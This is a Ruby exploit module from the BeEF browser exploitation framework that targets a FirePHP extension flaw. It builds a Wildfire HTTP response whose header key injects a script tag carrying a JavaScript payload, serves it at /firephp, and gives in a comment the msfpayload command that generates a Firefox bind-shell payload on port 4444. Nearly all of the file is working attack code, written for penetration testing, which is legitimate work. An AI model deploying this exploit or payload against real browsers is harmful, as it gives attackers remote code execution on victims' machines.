#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
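class Firephp_code_exec < BeEF::Core::Command
  # Hook run before the command is delivered to the hooked browser: builds the
  # FirePHP/Wildfire HTTP response that carries the JavaScript payload and
  # mounts it on BeEF's asset handler at /firephp.
  #
  # The payload is read from modules/exploits/firephp/payload.js. Regenerate it
  # with:
  #   msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
  #
  # @raise [Errno::ENOENT] if payload.js is missing; this is surfaced rather
  #   than mounting an exploit with an empty payload.
  def pre_send
    # Marker shared by the JSON message and the HTTP body. It only has to be
    # unique per mount, not unpredictable, so Kernel#rand is sufficient here.
    rand_str = rand(32**10).to_s(32)

    # File.read closes the handle even if reading raises; the previous
    # File.open + each_line + manual close leaked the descriptor on error.
    payload = File.read("#{$root_dir}/modules/exploits/firephp/payload.js")

    # Wildfire message: nine numeric padding headers, then a header whose *key*
    # holds the script tag. The module relies on the vulnerable FirePHP
    # extension rendering that key unescaped (see the advisory linked above).
    request_headers = (1..9).each_with_object({}) do |i, headers|
      headers[i.to_s] = rand(10).to_s
    end
    request_headers["<script>#{payload}</SCRIPT>"] = rand_str
    exploit = { 'RequestHeaders' => request_headers }.to_json

    # Wildfire chunk format is "<length>|<json>|". The length prefix is
    # expected to be a byte count, so use bytesize; this equals String#length
    # for the ASCII output of msfpayload but stays correct for multibyte text.
    wf_chunk = "#{exploit.bytesize}|#{exploit}|\r\n"

    # @todo use Router class instead of bind_raw()
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
      '200',
      {
        'Content-Type' => 'text/html',
        'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
        'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
        'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
        'X-Wf-1-1-1-1' => wf_chunk
      },
      rand_str,   # HTTP body
      '/firephp', # URI mount point
      -1          # NOTE(review): presumably "no limit on fetches" — confirm against AssetHandler#bind_raw
    )
  end

  # Persists the result the hooked browser reports back for this command.
  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end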